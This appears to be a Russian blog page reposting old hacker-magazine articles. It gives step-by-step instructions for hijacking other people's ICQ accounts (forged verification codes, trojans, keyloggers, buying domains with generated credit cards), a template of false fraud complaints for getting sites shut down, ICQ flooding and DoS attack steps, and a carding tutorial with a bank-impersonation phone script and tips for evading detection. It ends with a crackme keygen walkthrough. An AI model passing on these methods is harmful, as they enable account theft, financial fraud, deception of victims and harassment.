Все эти коды проходили при верификации пользователя. Но я не мог понять алгоритма их генерации, а, стало быть, не мог самостоятельно сгенерировать код для другого юина. Но была и хорошая информация. Последние 8 байт были всего лишь таймером и не влияли на сам код, а кодом были байты со 2 по 8, и первый байт был чем-то вроде ключа. Вот тут мне пришло на выручку дилетантство пользователей. Для того чтобы понять алгоритм генерации кодов, мне нужны были юины, у которых шестнадцатеричное значение составляло бы круглое число. То есть типа A00000, B00000. Такие юины в десятичной системе выглядят весьма абстрактно и не привлекательно. Большинство их пользователей ставило в качестве пароля либо свой ник, либо свое имя, либо имя своей любовницы, короче, информацию о пароле можно было почерпнуть в информации о пользователе. Еще не разобравшись до конца в алгоритме, я все же смог создать код для давно не используемого юина 6666. Моя радость не знала границ, когда мой код прошел, и я смог прописать в primary e-mail свой адрес. Елозя от нетерпения на стуле и проверяя каждые 3 минуты почтовый ящик, я ждал прихода письма с паролем. И тут без какого-либо предупреждения мне отключили аккаунт и почтовый ящик! Не буду уточнять, как и почему это произошло, скажу только, что настолько зол я никогда больше не был.

Ценности уплыли за границу. Может им там больше нравится?

В конце концов я все же получил пароль для этого юина и, наверное, стал первым в России счастливым обладателем четырехзначного номера аси. Алгоритм генерации кода в конечном итоге оказался не очень сложен. Например, для кода с первым байтом 0 все было просто элементарно. Берем номер аси хотя бы 123456, переводим его в шестнадцатеричную систему - 1E240, прибавляем к нему число 515DB19 et voila - код 0517BD593667B05A. Теперь осталось прописать свой e-mail и попросить сервер послать по нему письмо с паролем. Когда техническая проблема была разрешена, передо мной встала юридическая. Если с правами на владение юином 6666 было все ясно, т.к. им уже давно не пользовались, то с любым другим было сложнее. Ведь он мог еще и принадлежать кому-то. Возможно, сказалось отсутствие у меня юридического образования, но я так и не смог придумать, как ни напрягался, какой формой собственности является юин. Ни под личную, ни под частную, ни даже под интеллектуальную он не подходил. Затрат на его получение владелец никаких не нес. Стало быть, юридически юин - фикция. К тому же все эти юины уже неоднократно меняли владельца. И все-таки отдельные юины имеют ценность - ценность эстетическую. Ведь, что ни говори, а номер 11111 куда приятнее для глаза, чем, скажем, 6946261.

3 относительно честных способа получения юина

Несмотря на наличие или отсутствие дыр в системе Мирабилиса всегда были и будут существовать другие стандартные методы завладения чужим юином. Например:

1. Подбор пароля

Очень многие пользователи по каким-либо причинам делают очень легкие пароли. Это либо их ник, либо их имя или фамилия, либо их логин, который является первой частью их e-mail`а, либо какое-то слово, которое можно найти в инфе пользователя, либо простой набор символов, вроде 123456 или qwerty. К тому же существует целая библиотека стандартных паролей.

2. Получение доступа к почтовому ящику

Это самый обширный и самый распространенный метод, поэтому я разделю его на подвиды. Он используется в случае, если в графе пользователя primary e-mail прописан некий почтовый ящик, по которому можно получить пароль.

А. Повторная регистрация почтового ящика на сервере

Очень часто в этой графе прописывают почтовый ящик, зарегистрированный на каком-либо сервере, предоставляющем свои услуги бесплатно. Это и www.hotmail.com, и www.yahoo.com, и www.chat.ru. При длительном неиспользовании этого ящика (в течение полугода минимум) запись о нем уничтожается, и он может быть заново зарегистрирован любым другим пользователем. Поэтому если вы увидели такой адрес - первым делом проверьте, существует ли он еще.

Б. Первичная регистрация почтового ящика

Иногда люди указывают в этой графе адрес абстрактного почтового ящика на сервере, предоставляющем услуги бесплатной почты. То есть ранее этот ящик на данном сервере еще никем не был зарегистрирован, и ничто вам не мешает зарегистрировать его и получить на него пароль.

В. Вскрытие почтового ящика

Этот метод также подразумевает получение доступа к чужому почтовому ящику стандартными средствами, обычно подбором пароля или нахождением дыр в защите сервера, как это было с Хотмейлом или Чат.ру.

Г. Регистрация домена

Самый оригинальный на мой взгляд метод. Многие пользователи любят указывать почтовый ящик на несуществующих серверах. Примером могут служить ящики aaaaa@bbbbb.com. Для получения пароля этой аси вам достаточно, используя любую генерилку кредитных карточек, купить домен www.bbbbb.com и, когда он будет задействован, получить письмо с паролем. Единственное условие: к процессу регистрации домена нужно подходить с умом. Не везде вам позволят купить домен по несуществующей кредитке. Для этого я порекомендовал бы www.awc.net. Зарегистрированный там домен гарантированно просуществует пару недель - достаточный срок для получения письма.

3. Удаленный доступ к компьютеру

Данный метод подразумевает некоторые навыки общения с программами и методами, предоставляющими возможности удаленного доступа к компьютеру, на котором установлена аська с интересующим вас номером. Обычно для этих целей используется троянский конь Back Orifice. Однако им очень трудно производить пересылку файлов, и к тому же он получил слишком широкое распространение и теперь излечивается даже "доктором Вебом". Так что ищите менее распространенный, но не увлекайтесь особенно, ведь вы и сами можете стать его жертвой. Использование удаленного доступа также подразумевает не один способ.

А. Системные файлы

Вам нужно всего лишь получить системные файлы аськи. А именно: "номер_аси.dat и номер_аси.idx" из каталога "c:program filesicqdb". Это если ася проинсталлирована в каталог по умолчанию. Остальные файлы для этого юина вы сможете сфабриковать из аналогичных файлов любого другого номера. После этого, корректно изменив информацию в системном реестре, вы сможете сконнектиться под данным номером.

Б. Грабберы

В случае, если пользователь не использует сохранение пароля (снята галочка "Save password" в разделе "Security&Privacy"), то метод А неприменим. В этом случае используются так называемые грабберы клавиатуры - программы, которые незаметно для пользователя пишут в специальный файл все набранные им на клавиатуре символы. Естественно, в этот файл попадет и пароль аси. Пользоваться им весьма просто. Самый распространенный для этих целей граббер - hookdump. Достаточно каким-то образом поместить этот файл на компьютер с нужным вам номером аси и через некоторое время получить результат его деятельности.

Из нестандартных методов существовал также метод с переполнением буфера пароля аси. Специально написанная под юниксовые системы программа Hijack, использующая эту ошибку, позволяла, произведя ввод пароля больше 8 символов, вызвать ошибку сервера и сконнектиться под любым юином. Однако возможности смены информации пользователя и пароля были в ней специально заблокированы.

Все это и кое-что другое вы сможете найти по адресу http://mirabu.da.ru. Данная информация приведена исключительно в общеобразовательных целях.

Соломоны из Мирабилиса и их решения

Но довольно лирики. Если с моим моральным обликом уже все ясно, то описание взаимоотношений Мирабилиса с пользователями достойно отдельной главы.

Помнится мне, были славные времена, когда про Мирабилис мало кто знал и когда они отвечали даже на мои дурацкие запросы "...как расшифровывается ICQ?", тогда Мирабилис еще являлся фирмой, которая предоставляла некие услуги и поддерживала пользователей. Теперь это не больше чем мифическое чудовище, укрывшееся за непробиваемой стеной почтовых роботов, творящих отписки с производительностью советских бюрократов. Поговорить с кем-то из сотрудников все равно что взывать к богу - в лучшем случае получите от автоматического служителя культа стандартное: "Молитесь и воздастся". Когда я впервые потерял пароли от своих асек и обнаружил, что не могу узнать новые, так как снесена запись о моем почтовом ящике - я стал долбиться в закрытые двери technical support. То, что они закрыты и замурованы, я узнал позднее. Сначала я был полон оптимизма несмотря на полученные на мой запрос от почтового робота Мирабилис сочувствия по поводу утери пароля и рекомендацию завести новый номер. Мой энтузиазм начал спадать, когда я понял, что обнаруженные мною служебные юины технической поддержки пользователей аси - 70000 и 80000 скорее всего так и не выйдут в онлайн, чтобы разрешить мою проблему. Последней моей надеждой был телефонный номер Мирабилиса в Израиле, но и тут меня ждал полновесный "облом" в лице автоответчика, жизнерадостно объявившего женским голосом, что я таки да смог дозвониться в службу технической поддержки Мирабилиса. В дальнейшем я неоднократно убеждался в том, что Мирабилис самоустранился от решения проблем пользователей, предоставив им вариться в котле проблем самим и выбираться из него собственными силами. Убедился я и в том, что они достаточно решительно расправляются со своими проблемами, игнорируя при этом права других. Иногда решения сотрудников Мирабилиса чрезвычайно радикальны. Весьма показателен процесс перехода юина 123456 из рук в руки. Когда бразильский хакер Wax все-таки достал Мирабилис воплями о том, что у него похитили его любимый юин, то админ фирмы, недолго думая, просто захватил этот номер в свои руки и, видя, что не может его удержать, снес запись о нем с сервера. Та же участь постигла юины 12345 и 101012. Никаких потуг вернуть его истинному владельцу с их стороны не было. Более того. В одностороннем порядки, несмотря на протесты как минимум 3 действующих пользователей, были уничтожены все 4-х значные юины. Так что цезарю - цезарево, а божье - богу. В отношении наших юинов Мирабилис - высшее существо, позволяющее себе все.

29.01.2010 18:42

"руководство" по закрытию сервака

Если вас кто-то оскорбил на своей страничке или на своем личном виртуальном сервере, вы можете постараться, чтобы его закрыли. Итак, мальчики и девочки, первое, что вам нужно будет сделать, это узнать все о вашей виртуальной жертве...

Для начала нужно выяснить, какая фирма хостит неприятельский сервер, или, если же вам помешала веб страничка, то на каком сервере она расположена. Возьмем для примера тот же ГЕОСИТИС: http://www.geosities.com/SiliconValley/Hills/вашажертва/. Такой URL показывает, что страничка расположена на сервере geosities.com. Ну и еще один примерчик для странички. Возьмем, к примеру, известный российский сервер chat.ru. http://www.chat.ru/~вашажертва/. Как вы видите, ваша жертва находится на сервере www.chat.ru. Ну а если же вас оскорбили на виртуальном сервере, то придется повозиться чуть побольше. Любое доменное имя вместе с личным виртуальным сервером принадлежит какой-либо фирме, которая и занимается хостингом. Итак, к примеру, вас оскорбил вымышленный мною виртуальный сервер http://www.lamer.com/. Вам надо выяснить, какая компания его хостит. Есть хороший универсальный метод - программа SmartWhois от компании Tamos. Вы можете слить ее здесь: http://www.tamos.com/soft/. Если же вы не доверяете никаким программам и прочим пакостям, то все равно сможете найти эту хостинговую компанию. На сервере http://www.internick.com/ есть фишка, где вводишь доменное имя сервера (вашей жертвы), и вам скажут о нем все.

Итак, вы узнали компанию, которой принадлежит сервер неприятеля, теперь осталось только наябедничать. :)

Идем в ваш любимый почтовый клиент и пишем письма на следующие адреса:

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

xxx - Фирма , у которой заказывали сервер http://www.lamer.com/

To: webhelp@xxx.com;security@xxx.com;support@xxx.com;

billing@xxx.com;fraud@xxx.com;

Куда-нибудь, я думаю, все-таки дойдет :-)

А текст самого письмеца делаем таким:

Hello... I want to declare that web site (http://www.lamer.com) which you host (as far as i know) has been hacked or has been illegally bought via credit card fraud. They stole personal credit information from my friends and that page includes outrages to respected persons in russian language (win 1251 codepage). I hope that you will check the billing information of that site & put the end to this case.

Thank you for cooperation.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Так же поступаем и со страничкой , только все гораздо проще. Меньше геморроя с хостинговой компанией (тактика описана выше).

Но помните, что валить такие сайты можно только тогда, когда вас серьезно оскорбили, либо по каким-то другим конкретным причинам.

P.S: Не злоупотребляйте этим, а то и сайтов-то не останется.

29.01.2010 18:24

Как обидеть или защитить Асю

ICQ (I seek you) или по-русски «Ася» - самый популярный на сегодняшний день Интернет-пейджер. В сети ICQ на данный момент насчитывается около 30 миллионов пользователей. Многим юзерам эта программа стала также необходима, как и Вэб-браузер. С помощью нее можно как легко посылать файлы друг другу, так и общаться, причем не только вдвоем, но и огромной тусой (устраивать так называемый ICQ Chat) и многое другое. Все это дополняет прекрасный интерфейс и простота в обращении. Если ты еще не в курсе, что это такое, то беги скорее на http://www.mirabilis.com/ и скачивай эту прогу себе.

Естественно, такая популярная программа не могла пройти мимо хакеров. И очень скоро появилась куча маленьких программок, способных грохнуть твою Аську раз и навсегда. Ты, конечно, хитрый малый, и через несколько дней накачаешь их себе и выйдешь на тропу войны. Но! Не забудь защитить себя от таких же хитрецов. А вот о том, как это сделать, я тебе и расскажу.

Очень часто мерзкий хацкер будет пытаться закидать тебя большим количеством сообщений, причем приходить они будут от сгенерированных UINов (номеров Аси), то есть от пользователей, которых даже не существует в киберпространстве. Это называется ICQ флудинг. В Сети таких программ можно найти очень много всех видов и мастей. Что нужно знать врагу, чтобы тебя зафлудить? А не слишком-то и много... Всего лишь твой ICQ порт и IP адрес. Чтобы узнать IP адрес, нужно для начала посмотреть "INFO" пользователя. В поле "Current/Last I.P. Number" ты увидишь IP адрес жертвы. Если же ты видишь надпись "N/A", то это значит, что IP адрес скрыт (далее я расскажу, как это делается). Итак, даже если IP адрес скрыт, то его все равно можно увидеть, немного подумав... Самый простой и быстрый способ: отсоединиться от сети ICQ (уйти в оффлайн) и посмотреть "INFO" пользователя уже в оффлайне. И IP-шничек нарисуется, как на картине маслом. Теперь можешь снова выходить в онлайн. Второй, более сложный метод, это утилита "NETSTAT", которую включает в себя Win95/98/NT. Достаточно запустить файл /WINDOWS/netstat.exe, и ты увидишь всех, кому посылал какие-либо сообщения... Естественно, перед запуском файла нужно послать сообщение жертве. Итак, IP адрес ты знаешь, теперь осталось только определить порт ICQ. Для этого существует множество специальных программ. Нужно будет только ввести IP адрес жертвы, и прога скажет тебе порт, на котором висит ICQ клиент. Обычно ICQ порт должен находиться в диапазоне 1000-1100, но так бывает не всегда. Стандартные ICQ порты - 1027,1029,1080,1032. Но бывают и другие. Если проги для определения порта у тебя нет (то есть ты никогда не слышал о поисковых серверах), то придется расплачиваться за свое ламерство и делать все ручками. Без сканера Интернет портов ты, конечно, все равно ничего не сделаешь, так что его уж не поленись, скачай. В Сети такого мусора кучи. Я использую PortScan от 7th Sphere. На мой взгляд, он прост, удобен и, самое главное, эффективен. Итак, с большими усилиями, через 5 недель ты все-таки достал порт-сканер и заодно узнал, наконец-то, что же это такое - хакерские сайты. Теперь вводим IP адрес жертвы и начинаем сканировать с 1000 порта. Если ты нашел любой открытый порт в этом диапазоне, значит, он тот, что тебе нужен. Все! IP адрес и ICQ порт ты знаешь. В атаку! Вводим информацию в флудер и вперед...

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

А вот теперь, когда ты знаешь, как вся эта система работает, я объясню, как лучшим способом защититься от этой самой распространенной атаки. Все программы, написанные для антифлудинга, - отстой. Самая эффективная защита предусмотрена непосредственно в самой Аське. Итак, запускаем тетю Асю и в основном меню выбираем опцию "Security & Privacy". В этой опции ты увидишь еще 4 подменю: Security, Ignore List, Invisible List, Visible List. В подменю Security делаем следующее:

1. Ставим галочку в поле "My authorization is required". (это чтоб всякие lamazZ не добавляли тебя в свои контакт-листы без спросу).

2. Ставим галочку в поле "Do not allow others to see my IP adress" (скрываем свой IP-шник от посторонних) и ставим еще одну в поле "Allow others to view my online presence on the World Wide Web» (это чтоб народ мог видеть, когда ты в онлайне).

3. В подменю "Ignore List" ставим галочку в поле "Accept messages only from users on my contact list" (это чтоб тебя не могли зафлудить с липового UIN'а) и ставим еще одну в поле "Do not accept WWpager messages" (и здесь закрываемся от флуда).

Если ты хороший мальчик и делал все в точности, как я написал, то разные придурки, пытающиеся тебя зафлудить, очень сильно обломаются. А заодно ты прикрыл свой IP-шник от чужих глаз (чтоб тебя не нюкали всякие «кул хацкеры»).

Но к счастью для тебя, воина, и к несчастью для тебя, жертвы, существует много разных кряков для ICQ, позволяющих, например, добавить абсолютно любого пользователя без его согласия в свой контакт лист. Есть полезные кряки, которые позволяют увидеть IP адрес , даже если он скрыт, и т.д. и т.п.

Еще один очень эффективный способ защиты, это подмена IP адреса. Когда враг посмотрит твое "Info", то он увидит там IP-шник и начнет атаковать его. Но мимо него пролетит розовая птица Обломинго, так как IP-шничек-то этот будет липовым. :)

Чтобы подменить IP адрес, нужно сделать следующее:

1. Зайди в меню, выбери опцию "Preferences".

2. Войди в подменю "Connection".

3. Поставь галочку в поле "I'm using a permament internet connection (LAN)".

4. Затем поставь галочку в поле "I am behind a firewall or proxy".

5. Нажми на кнопку "Firewall Settings".

6. Теперь поставь галочку в поле "I am using a SOCKS4 proxy server".

7. Кликни "Next".

8. В поле "SOCKS 4 Host" введи поддельный IP адрес.

9. Кликни "Next".

10. Теперь проверь, работает или нет, нажав кнопку "Check my FireWall/Proxy Settings". Если все ОК, тогда жми на "DONE" и расплывайся в ехидной ухмылке. Вот и все дела, теперь в "INFO" у тебя какой-то левый IP, по которому твои тупоголовые враги могут пытаться тебя бомбить хоть до 1 января 2000 года.

Ну а если тебя просто достал какой-нибудь гений, и ты не хочешь с ним разговаривать, то можешь сделать с ним две добрые вещи...

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Первая заключается в том, чтобы его сообщения и другие послания больше никогда до тебя не долетали, а вторая - в том, чтобы этот кретин думал, что тебя все нет и нет за компьютером.

Итак, поехали. В первом случае зайди в меню, далее в "Security & Privacy", затем в подменю "Ignore List", после жми на кнопку "Add to Ignore List" и введи E-Mail, NickName или UIN, указанные в "Info" этого придурка. Больше он до тебя не достучится.

Во втором случае тоже зайди в меню, далее в "Security & Privacy", затем в подменю "Invisible List", там жми на кнопку "Add to Invisible List" и вводи E-Mail, NickName или UIN этого же перца. Теперь он больше никогда тебя не увидит.

Есть еще одна фишка, которой тебя могут вышвырнуть из Аськи. От этой атаки можно даже вылететь из Инета. После того как недруг узнает твой IP адрес, он будет использовать на тебе различные виды DoS атак (Nuke, ping of death, boink, teardrop, flood). Существует множество программ против подобных атак. На мой взгляд, лучшая из них - "Nuke Nabber". Она не только отражает более 50 видов подобных атак, но и засекает IP адрес нападающего, что очень полезно: можно ему ответить или просто узнать, кто из твоих дружков хочет тебя сбросить. Еще эта прога может блокировать портсканеры и предупредит, когда тебя попытаются просканировать. Еще одно преимущество Nuke Nabber'a над другими программами, это возможность добавления различных портов - как TCP, так и UDP. Можешь даже для прикола добавить порт "80 tcp" (порт, используемый для хождения по www браузером), написать свой IP адрес в браузере, NukeNabber сочтет это за атаку по 80 порту и скажет всю информацию о твоем браузере и предупредит тебя, какой он нехороший. :) Скачать Nuke Nabber ты сможешь на сервере http://www.freeware.ru/. Эта программа абсолютно бесплатна.

Ну и, конечно же, стандартное предупреждение: никогда не принимай всякие исполняемые файлы у малознакомых людей. А то у тебя в компьютере будут жить 258 вирусов и 462 трояна, а тебе и так твоего главного вируса - Форточек95/98 - должно хватать.

обсуждают 2

28.01.2010 19:27

Кардинг

Кардинг... Как много в этом слове для сердца русского слилось. Как много в нем отозвалось! Да, да, да, друзья мои. Именно кардингом мы сегодня и займемся. Всем известно, что Россия не особо блещет популярностью юзанья кредитных карточек, а попользоваться ими хочется, а порой это просто необходимо! Ну, признайся, ведь хочется иногда заглянуть на порносервер, да не краем глазика, а широко раскрыв свои глазищи (чтоб, ни дай Бог, чего-нибудь не пропустить), да еще и качнуть оттуда на свой винчестер мегабайта эдак на два. Да не вопрос! ------------------------------------------------------------------------ Для начала давай-ка разберемся, что такое "кардинг". В общем, это - незаконное использование кредитных карточек для покупки товаров или услуг. Вот так все просто. Эта отрасль хакерского ремесла очень полезна, особенно для тех из вас, кто сидит без работы, без стипендии и т.д. Занимаясь кардингом, можно либо получить информацию о реальной карте, либо сгенерировать все эти данные, но так, что все системы будут принимать ее за реальную. Я расскажу и о первом, и о втором вариантах. Только не надо думать, что, прочитав эту статью, ты сразу станешь крутым кардером. Конечно, эта статья не для профессионала, а для новичка, который не знает, как получить и использовать кредитную карточку хакерским стилем. ---------------------------------------------------------------------- Итак, начнем с реальных карт. Первая вещь, которую ты должен сделать, - это получить всю информацию о карте. Самый простой способ - пойти в местный магазин, который использует кредитные карточки. Покрутись вокруг магазина и посмотри, куда они выкидывают мусор. Запомни, мусор для мошенника - одно из главных средств получения информации. После того как они выкинули весь хлам из магазина, быстро иди и забирай его. Никто не гарантирует, что ты там найдешь хотя бы один номер карты, но, с другой стороны, есть очень большая вероятность, что в бумагах будет много полезной информации. А если тебе повезет, то - и слипы от карточек или отчетности бухгалтера по принятым карточкам, который допустил ошибку и выкинул документ, не рвя его на мелкие кусочки. Я знаю, копаться в мусоре - дело не царское. Зато, если удача окажется на твоей стороне, то ты будешь щедро вознагражден. Зачем же придумывают всякие варварские уничтожители документов? Да в любом агентстве, консультирующем по вопросам безопасности, тебе скажут, что мусор - самый простой способ узнать чужие тайны. ------------------------------------------------------------------------ Ты слишком горд, чтобы копаться в мусоре? ОК, тогда для тебя способ №2. Используй психологию! Друг мой, кроме того, что ты обладаешь хитростью, наглостью и напористостью, ты еще должен быть и психологом. Использовать слабые места в человеческом сознании - моя излюбленная вещь. Запомни, в мире существует 4 страсти, ради которых люди теряют голову: секс, власть, деньги и любовь. В нашем деле мы будем использовать деньги (пока). Итак, каждый человек трясется за свои денежки, особенно за крупные суммы. Тебе нужен кто-то, кто точно имеет кредитную карту (а, возможно, и не одну) и чье имя ты знаешь. Желательно, конечно, знать и банк, который выдал ему карту, но можно всегда сослаться на то, что счет прошел переводом через другой банк. Такого не бывает, но об этом ты забудешь рассказать. Система проста, как все гениальное. Ты звонишь этому перцу, и у вас с ним получается вот такой диалог. --------------------------------------------------------------------------- Ты: Добрый день. Это Иванов Иван? Он: Да. Ты: Вас беспокоит Фрик Хакович Хакеридзе из кредитно-кассового отдела банка "Национальный Кредит". Через нас прошел счет, в котором говорится, что вы в один день совершили покупку по кредитной карте на сумму 8000$. Нам нужно ваше подтверждение на такую крупную сумму операции. Он: Да вы с ума сошли??? Я не покупал ничего на 8000 баксов! Ты: Понятно. Значит, либо мы ошиблись, либо кто-то незаконно использует вашу карточку. Вы точно не делали такой покупки 1 января? Он: Да я уже сказал, нет! Это какая-то ошибка!!! Ты: Хорошо. Мы сейчас проверим. Продиктуйте, пожалуйста, номер вашей карты. Он: 1234567890123456. Ты: И дату окончания действия. Он: Ноябрь 99. Ты: Спасибо. Мы проверим. Пожалуйста, не делайте никаких покупок по этой карте в течение сегодняшнего дня. Он: Хорошо. Большое спасибо. Когда выясните, перезвоните мне, пожалуйста. Ты: Конечно. До свидания. Извините за беспокойство. -------------------------------------------------------------------- Вот тут есть некоторые тонкости. Во-первых, если тебе 12 лет, то и не стоит этим заниматься. Тебя просекут сразу же! Лучше попроси своего старшего брата или приятеля. Во-вторых, в разговоре надо быть как можно вежливее. Не забывай, ты - сотрудник крупного, уважающего себя банка и ты звонишь состоятельному клиенту. В-третьих, возможно, этот человек не такой уж лох, как ты думаешь. Он может спросить номер твоего телефона, чтобы самому тебе перезвонить, проверив тем самым, действительно ли ему звонят из банка. Поэтому НИКОГДА не звони из дома. Лучше всего это делать из какой-нибудь левой конторы или с хакнутого мобильного (о том, как хакнуть мобильный, мы поговорим в следующих номерах журнала). Когда тебе перезвонят, отвечай что-то типа: "Кредитно-кассовый отдел. Здравствуйте". Но, возможно, что ты не только боишься замарать свои ручонки, но и совершенно не умеешь разговаривать по телефону. Ну, не научила тебя мама, ну что ж поделать? Остается одно - применить способ №3. Этот способ почти ничего не требует от тебя лично. Найди какого-нибудь друга, который работает в супермаркете или магазине, принимающем кредитные карточки. Когда карточка проходит через кассира, то ее прокатывают в специальной машинке, и выдается 2 слипа (чека с информацией о карте и покупке). Первый слип отдается клиенту, а второй остается в магазине и потом направляется в банк, чтобы тот его оплатил. Договорись с ним, чтобы он давал тебе номера карточек со слипов, а ты, в свою очередь, будешь делать для него покупки по этим карточкам (не забывая себя, естественно). Таким способом ты прикроешь задницу своего друга, так как в случае чего он может сказать, что понятия не имеет ни о каких карточках, компьютера у него нет, что такое Интернет, он не знает и вообще он только что с гор спустился. ОК. Карта у тебя есть. Имя на карте и дату окончания действия ты знаешь. Что делать дальше? Дальше начинается следующий процесс работы, и это еще не сладостный миг удачи. Можно накачать себе из Интернета кучу платного софта. Это если ты не знаешь, что такое "Горбушка", и у тебя супер-пупер скорость подключения. Можно с помощью этой карточки открыть себе доступы на порносерверах. Это для тех, у кого подружка - компьютер. Если тебе и в жизни секса хватает, то твоя задача - вытащить из карты как можно больше наличных. Делается это так: ты заказываешь какой-нибудь товар, получаешь его и сразу же продаешь. Никогда не оставляй себе никакой товар. Этим ты только упростишь работу милиции, когда они придут к тебе знакомиться. Запомни некоторые советы: никогда не заказывай дважды в одном и том же месте, никогда не используй карточку более 2-х недель. Дело в том, что когда хозяину карточки придет счет, он позвонит в банк и скажет, что не делал такого заказа. После всех разборок карточку заблокируют. Но! Не думай, что они просто убьют счет. Они будут отслеживать попытки заказов по заблокированной карте. Еще один совет: кредитная карта называется "кредитной" потому, что для нее есть некоторая сумма, которой банк безоговорочно верит. То есть, если заказ не превышает эту сумму, то банк АВТОМАТИЧЕСКИ считает, что такая сумма есть на карте, и в случае, если ее там не окажется, банк сам покроет расходы. Поэтому система проверки заказов, не превышающих эту сумму, упрощена. Скажем прямо, проверки почти нет. Эти лимиты таковы: VISA - 40$, MasterCard - 50$. И еще один совет: я понимаю, что ты сразу же захочешь заказать 20-Гигабайтный винт или что-то в этом роде, но вот этого-то делать и не стоит. Вообще, старайся не заказывать компьютерные примочки. Лучше закажи себе телефон или дискман, в общем, что-то, что легко продать. Где заказывать? Ну, конечно же, в Интернете! Найди какой-нибудь сервер, который обслуживает кредитные карты. Постарайся найти не самый популярный сервер. Например, на "BuyDirect" у тебя такие вещи не пройдут. А вот какая-нибудь не очень распространенная звукозаписывающая компания, обещающая быструю доставку, с удовольствием продаст тебе парочку музыкальных CD. Никогда не заказывай в России! У нас, к сожалению, еще не так сильно распространена система оплаты кредитками, зато хаканье кредиток является народным творчеством, и поэтому к каждой покупке по кредитке относятся слишком серьезно. Есть большая вероятность, что перед тем, как тебе что-то отправят, номер кредитки проверят сто раз, да еще и дождутся, когда банк переведет им сумму твоего заказа. В Штатах и других буржуйских странах все намного проще. Чаще всего там дорожат своей репутацией, а так как скорость обслуживания клиентов - одна из главных характеристик хорошей компании, то там отправляют заказ сразу же, проверив только, существует ли такая карта в природе и есть ли на ней такая сумма. А вот теперь начинается самая трудная часть. На какой адрес заказывать? Можешь заказать на свой. Тогда, открыв посылку, вместо своего заказа ты там увидишь десять ОМОНовцев, которые почти дружелюбно предложат тебе примерить новую модель модных браслетов. Если такой вариант тебе не нравится, то вот небольшой списочек, куда надо заказывать покупки.

27.01.2010 20:30

Crackin' LibertyorDeaths ASM KeyGenMe #1

Цель взлома сегодня - LibertyorDeaths ASM KeyGenMe #1.
Взять его можно тут -
http://crackmes.de/users/libertyordeath/libertyordeaths_asm_keygenme1/download
Этот кейгенми 2-го уровня как раз для новичков(НО! как минимум знающих основы).

1. Открываем кейгенми в Олли и видим непонятную картину - один jmp и кучу битого кода. Это значит что код зашифрован, а jmp используется для перехода на декриптор. Код декриптора таков:

004011AE MOV ESI,ASM_KEYG.00401006
004011B3 MOV AL,BYTE PTR DS:[ESI]
004011B5 XOR AL,25
004011B7 MOV BYTE PTR DS:[ESI],AL
004011B9 INC ESI
004011BA CMP ESI,ASM_KEYG.004011A7
004011C0 JNZ SHORT ASM_KEYG.004011B3
004011C2 JMP ASM_KEYG.00401006

Как видишь, в нем никаких антиотладочных трюков, он очень прост, а значит можно запускать программу (F9) - пусть себе код расшифруется. Кстати, чуть выше можно увидеть криворукость создателя кейгенми:

004011A9 . E8 1A000000 CALL <JMP.&kernel32.ExitProcess> ; ExitProcess

Код не до конца зашифрован, а значит боятся нечего - создатель не профи))

2. Когда кейгенми запустится и появится окно, проанализируй код в Олли заново (Ctrl+A). Это нужно для того, чтобы код в отладчике занаво проанализировался и был покрасивее после обработки Олли.

3. Пролистай в Олли чуть выше, и ты увидишь главный код, который генерирует серийник. Там же находится API lstrcmpA - сравнение строк. Пролистай чуть выше до начала процедуры генерации (401114h)

4. Как видишь, код понятен и несложен, и мы можем рипнуть код с 401127h до 401152h для нашего кейгена.

Процедура начинается тут:
00401114 PUSH EDI
00401115 CMP DWORD PTR DS:[403100],0 ; Если длина имени = 0,
0040111C JE SHORT ASM_KEYG.00401191 ; тогда прыгаем к плохому сообщению
0040111E CMP DWORD PTR DS:[403128],0 ; Если длина введеного серийника = 0,
00401125 JE SHORT ASM_KEYG.00401191 ; тогда прыгаем к плохому сообщению
00401127 XOR ESI,ESI
00401129 XOR ECX,ECX
0040112B XOR EDX,EDX
0040112D MOV ECX,0
00401132 MOV EDX,0A

Здесь начинается главный цикл генерации серийника:
00401137 /MOVSX EAX,BYTE PTR DS:[ECX+4030C0] ; Получим букву имени
0040113E |INC EAX ; Математические операции
0040113F |ADD EAX,EDX ; которые генерируют серийник
00401141 |ADD ESI,EAX
00401143 |INC ECX
00401144 |IMUL EDX,ECX
00401147 |MOV EDI,EDX
00401149 |IMUL EDI,ESI
0040114C |CMP ECX,DWORD PTR DS:[403100] ; Сравним количество пройденых циклов с длиной имени
00401152 JNZ SHORT ASM_KEYG.00401137 ; Прыгаем в начало цикла, если они разные

Теперь мы имеем 2 числа, сгенереных на основе имени в ESi и EDI.
Следующий код форматирует правильный серийник на основе чисел в ESi и EDI.
00401154 PUSH EDI
00401155 PUSH ESI
00401156 PUSH ASM_KEYG.004030AE ; Формат = "LOD-%lu-%lX"
0040115B PUSH ASM_KEYG.00403104 ; В это буфере будет валидный серийник
00401160 CALL <JMP.&user32.wsprintfA>
00401165 ADD ESP,10

Этот код сравнивает серийники:
00401168 PUSH ASM_KEYG.004030E0
0040116D PUSH ASM_KEYG.00403104
00401172 CALL <JMP.&kernel32.lstrcmpA>

Если мы ввели неправильный SN, то прыгаем по адресу 401191h
00401177 CMP EAX,0
0040117A POP EDI
0040117B JNZ SHORT ASM_KEYG.00401191

Если мы ввели правильный SN, показываем "хорошее сообщение" и выходим из процедуры генерации.
0040117D PUSH 0
0040117F PUSH ASM_KEYG.00403092 ; |Title = "Yay!"
00401184 PUSH ASM_KEYG.00403084 ; |Text = "Valid Serial!"
00401189 PUSH 0
0040118B CALL <JMP.&user32.MessageBoxA>
00401190 RETN

Этот код показывает "плохое" сообщение и выходит из программы
00401191 PUSH 0
00401193 PUSH ASM_KEYG.004030A7 ; |Title = "Error!"
00401198 PUSH ASM_KEYG.00403097 ; |Text = "Invalid Serial!"
0040119D PUSH 0
0040119F CALL <JMP.&user32.MessageBoxA>
004011A4 PUSH ASM_KEYG.00403124
004011A9 CALL <JMP.&kernel32.ExitProcess> ; Выход!

Вот кусок исходника моего кейгена, отвечающий за генерацию серийника:

.data?
Buffer1 db 256 dup (?)
Buffer2 db 256 dup (?)
n_length dd ?
.data
fmtstr db "LOD-%lu-%lX",0
.code
Generate proc hWin:HWND
invoke GetDlgItemText,hWin,700,ADDR Buffer1,32
invoke lstrlen, addr Buffer1
mov n_length, eax
XOR ESI,ESI
XOR ECX,ECX
XOR EDX,EDX
MOV ECX,0
MOV EDX,0Ah
here:
MOVSX EAX,BYTE PTR [ECX+Buffer1]
INC EAX
ADD EAX,EDX
